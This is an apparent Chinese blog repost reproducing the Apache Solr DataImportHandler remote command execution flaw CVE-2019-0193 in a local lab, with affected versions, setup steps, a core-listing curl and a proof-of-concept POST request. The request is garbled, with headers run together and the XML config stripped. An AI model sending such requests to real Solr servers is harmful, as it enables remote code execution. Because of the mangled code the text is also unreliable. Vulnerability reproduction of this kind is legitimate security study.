热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

ApacheSolr远程命令执行CVE-2019-0193漏洞复现的示例分析

今天就跟大家聊聊有关ApacheSolr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以

今天就跟大家聊聊有关Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

0x01 影响范围


Apache Solr <8.2.0

0x02 环境搭建


下载地址:

https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

在本地解压,进入solr-7.7.2目录,执行命令

bin/solr -e dih (前提:java环境)

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

然后访问http://localhost:8983/solr即可访问环境

0x03 漏洞利用


首先我们可以通过接口

curl http://127.0.0.1:8983/solr/admin/cores

来获取所有 core 信息,下面我们构造 payload 需要 name 信息

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

在Burp中发送以下POC即可执行命令弹出计算器,下面的 需要替换为你获取到的 core 的 name(共两处)

POST /solr//dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=&name=dataimport&dataCOnfig=url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" />
执行效果如下:

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

看完上述内容,你们对Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注编程笔记行业资讯频道,感谢大家的支持。


推荐阅读
author-avatar
平凡瞬间15
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有